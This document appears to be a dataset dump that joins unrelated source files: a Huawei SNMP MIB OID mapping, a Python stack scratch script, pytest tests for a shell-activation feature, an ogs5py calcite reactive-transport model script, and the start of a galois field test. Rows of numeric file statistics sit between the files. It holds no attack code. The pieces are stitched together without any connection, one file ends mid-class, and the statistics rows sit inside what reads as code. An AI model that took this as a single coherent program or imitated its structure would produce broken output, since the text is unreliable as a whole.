"HUAWEI-SYS-MAN-MIB::hwSysRebootTimes": "1.3.6.1.4.1.2011.5.25.19.1.14.1",
"HUAWEI-SYS-MAN-MIB::hwSysRebootRecordTable": "1.3.6.1.4.1.2011.5.25.19.1.14.2",
"HUAWEI-SYS-MAN-MIB::hwSysRebootRecordEntry": "1.3.6.1.4.1.2011.5.25.19.1.14.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysRebootRecordIndex": "1.3.6.1.4.1.2011.5.25.19.1.14.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysRebootReason": "1.3.6.1.4.1.2011.5.25.19.1.14.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysRebootTime": "1.3.6.1.4.1.2011.5.25.19.1.14.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysDeviceCheck": "1.3.6.1.4.1.2011.5.25.19.1.15",
"HUAWEI-SYS-MAN-MIB::hwSysDeviceCheckStart": "1.3.6.1.4.1.2011.5.25.19.1.15.1",
"HUAWEI-SYS-MAN-MIB::hwSysDeviceCheckState": "1.3.6.1.4.1.2011.5.25.19.1.15.2",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverState": "1.3.6.1.4.1.2011.5.25.19.1.19",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverStateTable": "1.3.6.1.4.1.2011.5.25.19.1.19.1",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverStateEntry": "1.3.6.1.4.1.2011.5.25.19.1.19.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverStateIndex": "1.3.6.1.4.1.2011.5.25.19.1.19.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverSlotId": "1.3.6.1.4.1.2011.5.25.19.1.19.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverBoardType": "1.3.6.1.4.1.2011.5.25.19.1.19.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverInfo": "1.3.6.1.4.1.2011.5.25.19.1.19.1.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverStateMultiTable": "1.3.6.1.4.1.2011.5.25.19.1.19.2",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverStateMultiEntry": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysMultiSwtStateIndex": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysMultiSwtChassisId": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysMultiSwtSlotId": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysMultiSwtBoardType": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysMultiSwtInfo": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFile": "1.3.6.1.4.1.2011.5.25.19.1.20",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileNum": "1.3.6.1.4.1.2011.5.25.19.1.20.1",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileTable": "1.3.6.1.4.1.2011.5.25.19.1.20.2",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileEntry": "1.3.6.1.4.1.2011.5.25.19.1.20.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.20.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileName": "1.3.6.1.4.1.2011.5.25.19.1.20.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileSize": "1.3.6.1.4.1.2011.5.25.19.1.20.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileLocation": "1.3.6.1.4.1.2011.5.25.19.1.20.2.1.4",
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIBNotifications": "1.3.6.1.4.1.2011.5.25.19.2",
"HUAWEI-SYS-MAN-MIB::hwSysClockChangedNotification": "1.3.6.1.4.1.2011.5.25.19.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysReloadNotification": "1.3.6.1.4.1.2011.5.25.19.2.2",
"HUAWEI-SYS-MAN-MIB::hwSysMasterHDError": "1.3.6.1.4.1.2011.5.25.19.2.3",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveHDError": "1.3.6.1.4.1.2011.5.25.19.2.4",
"HUAWEI-SYS-MAN-MIB::hwPatchTrap": "1.3.6.1.4.1.2011.5.25.19.2.5",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorTrap": "1.3.6.1.4.1.2011.5.25.19.2.5.1",
"HUAWEI-SYS-MAN-MIB::hwPatchActiveOverTimeTrap": "1.3.6.1.4.1.2011.5.25.19.2.5.2",
"HUAWEI-SYS-MAN-MIB::hwPatchMalfunctionComebackTrap": "1.3.6.1.4.1.2011.5.25.19.2.5.3",
"HUAWEI-SYS-MAN-MIB::hwPatchUpdateTrap": "1.3.6.1.4.1.2011.5.25.19.2.5.4",
"HUAWEI-SYS-MAN-MIB::hwSysMasterCfcardError": "1.3.6.1.4.1.2011.5.25.19.2.6",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveCfcardError": "1.3.6.1.4.1.2011.5.25.19.2.7",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchSuccessNotification": "1.3.6.1.4.1.2011.5.25.19.2.8",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchFailNotification": "1.3.6.1.4.1.2011.5.25.19.2.9",
"HUAWEI-SYS-MAN-MIB::hwSysIssuNotification": "1.3.6.1.4.1.2011.5.25.19.2.10",
"HUAWEI-SYS-MAN-MIB::hwPatchInstallFail": "1.3.6.1.4.1.2011.5.25.19.2.11",
"HUAWEI-SYS-MAN-MIB::hwPatchInstallFailClear": "1.3.6.1.4.1.2011.5.25.19.2.12",
"HUAWEI-SYS-MAN-MIB::hwSumUpgradeSuccess": "1.3.6.1.4.1.2011.5.25.19.2.13",
"HUAWEI-SYS-MAN-MIB::hwSysCfgFileErrorNotification": "1.3.6.1.4.1.2011.5.25.19.2.14",
"HUAWEI-SYS-MAN-MIB::hwSysImageErrorNotification": "1.3.6.1.4.1.2011.5.25.19.2.15",
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIBConformance": "1.3.6.1.4.1.2011.5.25.19.3",
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIBCompliances": "1.3.6.1.4.1.2011.5.25.19.3.1",
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIBGroups": "1.3.6.1.4.1.2011.5.25.19.3.2",
}
| 79.332061 | 96 | 0.631273 | 4,716 | 20,785 | 2.782019 | 0.063401 | 0.044512 | 0.223171 | 0.278963 | 0.635518 | 0.582774 | 0.498399 | 0.361357 | 0.346723 | 0.346723 | 0 | 0.248338 | 0.073563 | 20,785 | 261 | 97 | 79.636015 | 0.433008 | 0.021313 | 0 | 0 | 0 | 0.975709 | 0.853896 | 0.852027 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.004049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
79337aa3bcf0f0a0700c2982d3889104c51ce47f | 471 | py | Python | scratch/tmp.py | quenette/COMPASS-I | 73e4d1c17de8eddedb11d47cd27bac40024d3b30 | [
"Apache-2.0"
] | null | null | null | scratch/tmp.py | quenette/COMPASS-I | 73e4d1c17de8eddedb11d47cd27bac40024d3b30 | [
"Apache-2.0"
] | null | null | null | scratch/tmp.py | quenette/COMPASS-I | 73e4d1c17de8eddedb11d47cd27bac40024d3b30 | [
"Apache-2.0"
] | null | null | null | try:
i_stack.append( i )
except NameError:
i_stack = []
i = 0
try:
i_stack.append( i )
except NameError:
i_stack = []
i = 7
try:
i_stack.append( i )
except NameError:
i_stack = ()
i = 8
print(i)
print(i_stack)
try:
i = i_stack.pop()
except IndexError:
pass
print(i)
print(i_stack)
try:
i = i_stack.pop()
except IndexError:
pass
print(i)
print(i_stack)
try:
i = i_stack.pop()
except IndexError:
pass
print(i)
print(i_stack)
| 9.612245 | 23 | 0.630573 | 77 | 471 | 3.688312 | 0.168831 | 0.274648 | 0.15493 | 0.169014 | 0.989437 | 0.989437 | 0.989437 | 0.989437 | 0.989437 | 0.989437 | 0 | 0.008772 | 0.273885 | 471 | 48 | 24 | 9.8125 | 0.821637 | 0 | 0 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.085714 | 0 | null | null | 0.228571 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 11 |
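The scratch file above exercises a save/restore idiom: push the current value of `i` before overwriting it, then pop to restore, with `NameError` guarding first use and `IndexError` guarding stack exhaustion. The same idiom in Python 3 syntax, as a sketch rather than a replacement for the file:

```python
i_stack = []
i = 0
i_stack.append(i)   # save 0
i = 7
i_stack.append(i)   # save 7
i = 8
try:
    i = i_stack.pop()   # restore 7
except IndexError:
    pass
try:
    i = i_stack.pop()   # restore 0
except IndexError:
    pass
assert i == 0 and i_stack == []
```

Note the file's third `except NameError` branch assigns `i_stack = ()` (a tuple); that branch never runs here, but if it did, the next `append` would raise `AttributeError`.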
f75e315be9c1fa43f3c8375d341bbc256a185eda | 4,856 | py | Python | tests/feature/smartcd/test_smartcd.py | gfi-centre-ouest/docker-devbox-ddb | 1597d85ef6e9e8322cce195a454de54186ce9ec7 | [
"MIT"
] | 4 | 2020-06-11T20:54:47.000Z | 2020-09-22T13:07:17.000Z | tests/feature/smartcd/test_smartcd.py | gfi-centre-ouest/docker-devbox-ddb | 1597d85ef6e9e8322cce195a454de54186ce9ec7 | [
"MIT"
] | 113 | 2019-11-07T00:40:36.000Z | 2021-01-18T12:50:16.000Z | tests/feature/smartcd/test_smartcd.py | inetum-orleans/docker-devbox-ddb | 20c713cf7bfcaf289226a17a9648c17d16003b4d | [
"MIT"
] | null | null | null | import os
import pytest
from pytest_mock import MockerFixture
from ddb.__main__ import main, load_registered_features
from ddb.feature import features
from ddb.feature.core import CoreFeature
from ddb.feature.shell import ShellFeature
from ddb.feature.smartcd import SmartcdFeature, SmartcdAction, WindowsProjectActivate
@pytest.mark.skipif("os.name == 'nt'")
class TestSmartcdAction:
def test_empty_project_without_core(self, project_loader, mocker: MockerFixture):
mocker.patch('ddb.feature.smartcd.actions.is_smartcd_installed', lambda: True)
project_loader("empty")
features.register(SmartcdFeature())
load_registered_features()
action = SmartcdAction()
action.execute()
assert not os.path.exists(".bash_enter")
assert not os.path.exists(".bash_leave")
def test_empty_project_with_core(self, project_loader, mocker: MockerFixture):
mocker.patch('ddb.feature.smartcd.actions.is_smartcd_installed', lambda: True)
project_loader("empty")
features.register(CoreFeature())
features.register(SmartcdFeature())
load_registered_features()
action = SmartcdAction()
action.execute()
assert not os.path.exists(".bash_enter")
assert not os.path.exists(".bash_leave")
def test_empty_project_with_activate_deactivate_commands(self, project_loader, mocker: MockerFixture):
mocker.patch('ddb.feature.smartcd.actions.is_smartcd_installed', lambda: True)
project_loader("empty")
features.register(CoreFeature())
features.register(ShellFeature())
features.register(SmartcdFeature())
load_registered_features()
action = SmartcdAction()
action.execute()
assert os.path.exists(".bash_enter")
assert os.path.exists(".bash_leave")
with open(".bash_enter") as f:
content = f.read()
assert "$(ddb activate)" in content
with open(".bash_leave") as f:
assert "$(ddb deactivate)" in f.read()
def test_empty_project_main(self, project_loader, mocker: MockerFixture):
mocker.patch('ddb.feature.smartcd.actions.is_smartcd_installed', lambda: True)
project_loader("empty")
main(["configure"])
assert os.path.exists(".bash_enter")
assert os.path.exists(".bash_leave")
with open(".bash_enter") as f:
content = f.read()
assert "$(ddb activate)" in content
with open(".bash_leave") as f:
assert "$(ddb deactivate)" in f.read()
def test_empty_project_main_no_smartcd(self, project_loader, mocker: MockerFixture):
mocker.patch('ddb.feature.smartcd.actions.is_smartcd_installed', lambda: False)
project_loader("empty")
main(["configure"])
assert not os.path.exists(".bash_enter")
assert not os.path.exists(".bash_leave")
@pytest.mark.skipif("os.name != 'nt'")
class TestWindowsProjectActivate:
def test_empty_project_without_core(self, project_loader):
project_loader("empty")
features.register(SmartcdFeature())
load_registered_features()
action = WindowsProjectActivate()
action.execute()
assert not os.path.exists("ddb_activate.bat")
assert not os.path.exists("ddb_deactivate.bat")
def test_empty_project_with_core(self, project_loader):
project_loader("empty")
features.register(CoreFeature())
features.register(SmartcdFeature())
load_registered_features()
action = WindowsProjectActivate()
action.execute()
assert not os.path.exists("ddb_activate.bat")
assert not os.path.exists("ddb_deactivate.bat")
def test_empty_project_with_activate_deactivate_commands(self, project_loader):
project_loader("empty")
features.register(CoreFeature())
features.register(ShellFeature())
features.register(SmartcdFeature())
load_registered_features()
action = WindowsProjectActivate()
action.execute()
assert os.path.exists("ddb_activate.bat")
assert os.path.exists("ddb_deactivate.bat")
with open("ddb_activate.bat") as f:
assert "set command=(ddb activate)" in f.read()
with open("ddb_deactivate.bat") as f:
assert "set command=(ddb deactivate)" in f.read()
def test_empty_project_main(self, project_loader):
project_loader("empty")
main(["configure"])
assert os.path.exists("ddb_activate.bat")
assert os.path.exists("ddb_deactivate.bat")
with open("ddb_activate.bat") as f:
assert "set command=(ddb activate)" in f.read()
with open("ddb_deactivate.bat") as f:
assert "set command=(ddb deactivate)" in f.read()
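The tests in this file stub out `is_smartcd_installed` through `pytest-mock`'s `mocker.patch` before driving each action. A dependency-free sketch of the same patching seam using the standard library's `unittest.mock` (the module object below is a hypothetical stand-in, not ddb's real `actions` module):

```python
import types
from unittest import mock

# Hypothetical stand-in for a module exposing an installation check.
actions = types.ModuleType("actions")
actions.is_smartcd_installed = lambda: False

with mock.patch.object(actions, "is_smartcd_installed", lambda: True):
    print(actions.is_smartcd_installed())  # True while the patch is active

print(actions.is_smartcd_installed())  # False again: the context manager restores the original
```

`mocker.patch` offers the same semantics with automatic teardown when each test finishes, which is why the tests above never restore the function themselves.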
| 31.329032 | 106 | 0.669481 | 556 | 4,856 | 5.645683 | 0.120504 | 0.074546 | 0.068812 | 0.047786 | 0.89519 | 0.89519 | 0.885314 | 0.866837 | 0.866837 | 0.828289 | 0 | 0 | 0.219316 | 4,856 | 154 | 107 | 31.532468 | 0.828014 | 0 | 0 | 0.788462 | 0 | 0 | 0.179572 | 0.049423 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.086538 | false | 0 | 0.076923 | 0 | 0.182692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f768c671923cbd81ce045ab7122f4799ee250e89 | 8,982 | py | Python | benchmarks/C/calcite_ChemApp/eq.py | GeoStat-Framework/ogs5py_benchmarks | 0b6db19b87cfad36459757f99ce2458f8e12b20b | [
"BSD-4-Clause"
] | 3 | 2019-01-15T17:38:11.000Z | 2020-01-07T23:44:12.000Z | benchmarks/C/calcite_ChemApp/eq.py | GeoStat-Framework/ogs5py_benchmarks | 0b6db19b87cfad36459757f99ce2458f8e12b20b | [
"BSD-4-Clause"
] | 1 | 2020-05-12T09:18:09.000Z | 2020-05-12T10:48:32.000Z | benchmarks/C/calcite_ChemApp/eq.py | GeoStat-Framework/ogs5py_benchmarks | 0b6db19b87cfad36459757f99ce2458f8e12b20b | [
"BSD-4-Clause"
] | 1 | 2020-01-08T13:28:50.000Z | 2020-01-08T13:28:50.000Z | # -*- coding: utf-8 -*-
from ogs5py import OGS
model = OGS(
task_root='eq_root',
task_id='eq',
output_dir='out',
)
model.msh.read_file('eq.msh')
model.gli.read_file('eq.gli')
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='GROUNDWATER_FLOW',
NUM_TYPE='NEW',
ELEMENT_MATRIX_OUTPUT=0,
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.rfd.read_file('eq.rfd')
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='GROUNDWATER_FLOW',
PRIMARY_VARIABLE='HEAD',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 200000.0],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='pH',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 7.0],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='O',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 3e-10],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Mg',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 0.001],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Ca',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 1e-10],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Cl',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 0.002],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='C',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 1e-10],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Calcite',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 1e-12],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Dolomite(dis)',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 1e-12],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Magnesite',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 0.0],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Eh',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 0.0],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='GROUNDWATER_FLOW',
PRIMARY_VARIABLE='HEAD',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 200000.0],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='pH',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 9.91],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='O',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.000369],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Mg',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 1e-12],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Ca',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.000123],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Cl',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 2e-12],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='C',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.000123],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Calcite',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.000207],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Dolomite(dis)',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 1e-10],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Magnesite',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.0],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Eh',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.0],
)
model.st.add_block(
main_key='SOURCE_TERM',
PCS_TYPE='GROUNDWATER_FLOW',
PRIMARY_VARIABLE='HEAD',
GEO_TYPE=['POINT', 'POINT1'],
DIS_TYPE=['CONSTANT', -2.9976852e-06],
)
model.mmp.add_block(
main_key='MEDIUM_PROPERTIES',
GEOMETRY_DIMENSION=1,
GEOMETRY_AREA=1.0,
POROSITY=[1, 0.32],
TORTUOSITY=[1, 1.0],
PERMEABILITY_TENSOR=['ISOTROPIC', 1.157e-12],
MASS_DISPERSION=[1, 0.0067, 0.1],
DENSITY=[1, 1800.0],
)
model.msp.add_block(
main_key='SOLID_PROPERTIES',
DENSITY=[1, 1800.0],
)
model.mfp.add_block(
main_key='FLUID_PROPERTIES',
FLUID_TYPE='LIQUID',
PCS_TYPE='HEAD',
DENSITY=[1, 1000.0],
VISCOSITY=[1, 0.001],
HEAT_CAPACITY=[1, 0.0],
HEAT_CONDUCTIVITY=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='pH',
MOBILE=0,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='O',
MOBILE=1,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Mg',
MOBILE=1,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Ca',
MOBILE=1,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Cl',
MOBILE=1,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='C',
MOBILE=1,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Calcite',
MOBILE=0,
DIFFUSION=0,
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Dolomite(dis)',
MOBILE=0,
DIFFUSION=0,
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Magnesite',
MOBILE=0,
DIFFUSION=0,
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Eh',
MOBILE=0,
DIFFUSION=0,
)
model.num.add_block(
main_key='NUMERICS',
PCS_TYPE='GROUNDWATER_FLOW',
ELE_GAUSS_POINTS=3,
LINEAR_SOLVER=[2, 6, 1e-14, 1000, 1.0, 1, 2],
)
model.num.add_block(
main_key='NUMERICS',
PCS_TYPE='MASS_TRANSPORT',
LINEAR_SOLVER=[2, 6, 1e-14, 1000, 0.5, 1, 2],
ELE_GAUSS_POINTS=3,
)
model.tim.add_block(
main_key='TIME_STEPPING',
PCS_TYPE='GROUNDWATER_FLOW',
TIME_STEPS=[
[100, 10.0],
[200, 100],
],
TIME_END=21000.0,
TIME_START=0.0,
)
model.tim.add_block(
main_key='TIME_STEPPING',
PCS_TYPE='MASS_TRANSPORT',
TIME_STEPS=[
[100, 10.0],
[200, 100],
],
TIME_END=21000.0,
TIME_START=0.0,
)
model.out.add_block(
main_key='OUTPUT',
NOD_VALUES=[
['C'],
['Ca'],
['Mg'],
['Cl'],
['pH'],
['Calcite'],
['Dolomite(dis)'],
['Magnesite'],
],
GEO_TYPE=['POINT', 'POINT2'],
DAT_TYPE='TECPLOT',
)
model.out.add_block(
main_key='OUTPUT',
NOD_VALUES=[
['HEAD'],
['C'],
['Ca'],
['Mg'],
['Cl'],
['pH'],
['Calcite'],
['Dolomite(dis)'],
['Magnesite'],
],
GEO_TYPE=['POLYLINE', 'OUT_LINE'],
DAT_TYPE='TECPLOT',
TIM_TYPE=[
[0.0],
[100.0],
[1000.0],
[10000.0],
[21000.0],
],
)
model.out.add_block(
main_key='OUTPUT',
NOD_VALUES=[
['HEAD'],
['C'],
['Ca'],
['Mg'],
['Cl'],
['pH'],
['Eh'],
['Calcite'],
['Dolomite(dis)'],
['Magnesite'],
],
GEO_TYPE='DOMAIN',
DAT_TYPE='TECPLOT',
TIM_TYPE=[
[0.0],
[100.0],
[1000.0],
[10000.0],
[21000.0],
],
)
model.write_input()
model.run_model()
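This generated script drives ogs5py entirely through repeated `add_block` calls that collect keyword arguments into named configuration blocks, which `write_input` later serialises. A minimal sketch of that builder pattern (the class and rendering format here are illustrative, loosely modelled on OGS5's `#KEYWORD` / `$SUBKEYWORD` input style, not ogs5py's actual internals):

```python
class BlockFile:
    """Collects named keyword blocks and renders them in an OGS-like text form."""

    def __init__(self):
        self.blocks = []

    def add_block(self, main_key, **kwargs):
        # Each call appends one (main_key, sub-keyword dict) pair, preserving call order.
        self.blocks.append((main_key, kwargs))

    def render(self):
        lines = []
        for main_key, kwargs in self.blocks:
            lines.append(f"#{main_key}")
            for key, value in kwargs.items():
                lines.append(f" ${key}")
                lines.append(f"  {value}")
        return "\n".join(lines)

cfg = BlockFile()
cfg.add_block(main_key="PROCESS", PCS_TYPE="GROUNDWATER_FLOW", NUM_TYPE="NEW")
print(cfg.render())
```

Because keyword arguments keep insertion order in Python, the rendered block preserves the order in which the script declares each sub-keyword.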
| 22.014706 | 49 | 0.620797 | 1,190 | 8,982 | 4.395798 | 0.121008 | 0.082585 | 0.123877 | 0.154846 | 0.852418 | 0.842286 | 0.821067 | 0.781495 | 0.771172 | 0.74307 | 0 | 0.043478 | 0.201069 | 8,982 | 407 | 50 | 22.068796 | 0.685479 | 0.002338 | 0 | 0.725926 | 0 | 0 | 0.234736 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.002469 | 0 | 0.002469 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f78c33499742edfcc8912ea22b1d1a87e60ca733 | 13,307 | py | Python | tests/fields/test_instantiation.py | Werni2A/galois | 97c35afdd1ad38705f2b1e643237fbd2f87bb6e3 | [
"MIT"
] | null | null | null | tests/fields/test_instantiation.py | Werni2A/galois | 97c35afdd1ad38705f2b1e643237fbd2f87bb6e3 | [
"MIT"
] | null | null | null | tests/fields/test_instantiation.py | Werni2A/galois | 97c35afdd1ad38705f2b1e643237fbd2f87bb6e3 | [
"MIT"
] | null | null | null | """
A pytest module to test instantiation of new Galois field arrays.
"""
import random
import pytest
import numpy as np
import galois
from ..helper import array_equal
DTYPES = galois.dtypes.DTYPES + [np.object_]
def test_cant_instantiate_GF():
v = [0, 1, 0, 1]
with pytest.raises(NotImplementedError):
a = galois.FieldArray(v)
class Test0D:
